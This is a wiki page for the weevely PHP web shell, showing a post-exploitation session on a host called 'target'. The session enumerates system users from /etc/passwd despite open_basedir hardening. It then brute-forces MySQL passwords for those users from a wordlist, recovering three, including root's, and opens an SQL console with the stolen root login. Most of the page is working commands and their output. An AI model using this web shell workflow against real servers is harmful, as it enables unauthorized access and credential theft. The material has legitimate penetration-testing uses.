Skip to content

Bruteforce SQL credentials

Jump to bottom
epinna edited this page Sep 20, 2014 · 1 revision

This example shows how to bruteforce credentials of multiple SQL users.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system and open_basedir = /var/www/html/
  • Used modules: audit_etcpasswd, bruteforce_sql, and sql_console

Session

Gather as more as system usernames we can. Even if the open_basedir hardening does not allow any access outside the web folder and we can't execute system commands, we can still enumerate the system users using module audit_etcpasswd.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_1.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

www-data@target:/var/www/html PHP> cd ..
[-][cd] Failed cd '..': no such directory or permission denied
www-data@target:/var/www/html PHP> cat /etc/passwd
[-][download] File download failed, please check remote path and permissions
www-data@target:/var/www/html PHP> :audit_etcpasswd -real
root:x:0:0:root:/root:/bin/bash
roblast:x:1000:1000:roblast,,,:/home/roblast:/bin/bash
micjanost:x:1001:1001:micjanost,,,:/home/micjanost:/bin/bash
pjgomes:x:1002:1002:pjgomes,,,:/home/pjgomes:/bin/bash
pdpeers:x:1003:1003:pdpeers,,,:/home/pdpeers:/bin/bash
www-data@target:/var/www/html PHP>

We got 5 usernames which we can try to bruteforce to find the SQL password. Launch the SQL bruteforce module using as password wordlist the local file wordlists/huge.txt.

www-data@target:/var/www/html PHP> :bruteforce_sql

error: too few arguments
usage: bruteforce_sql [-h] [-hostname HOSTNAME] [-users [USERS [USERS ...]]]
                      [-pwds [PWDS [PWDS ...]]] [-fusers FUSERS]
                      [-fpwds FPWDS]
                      {mysql,pgsql}

Bruteforce SQL database

positional arguments:
  {mysql,pgsql}         Service to bruteforce

optional arguments:
  -h, --help            show this help message and exit
  -hostname HOSTNAME    Hostname
  -users [USERS [USERS ...]]
                        Users
  -pwds [PWDS [PWDS ...]]
                        Passwords
  -fusers FUSERS        Local file path containing users list
  -fpwds FPWDS          Local file path containing password list

www-data@target:/var/www/html PHP> :bruteforce_sql mysql -users roblast micjanost pjgomes pdpeers root -fpwds wordlists/huge.txt 
roblast:reckoned
pjgomes:national
root:Gilchrist
www-data@target:/var/www/html PHP>

In few seconds we got 3 out of 5 credentials. Use sql_console to check the found accounts.

www-data@target:/var/www/html PHP> :sql_console -u root -p Gilchrist
root@localhost SQL> show databases;
+--------------------+
| mysql              |
| performance_schema |
| test               |
| appdb              |
+--------------------+
root@localhost SQL>

:)

Clone this wiki locally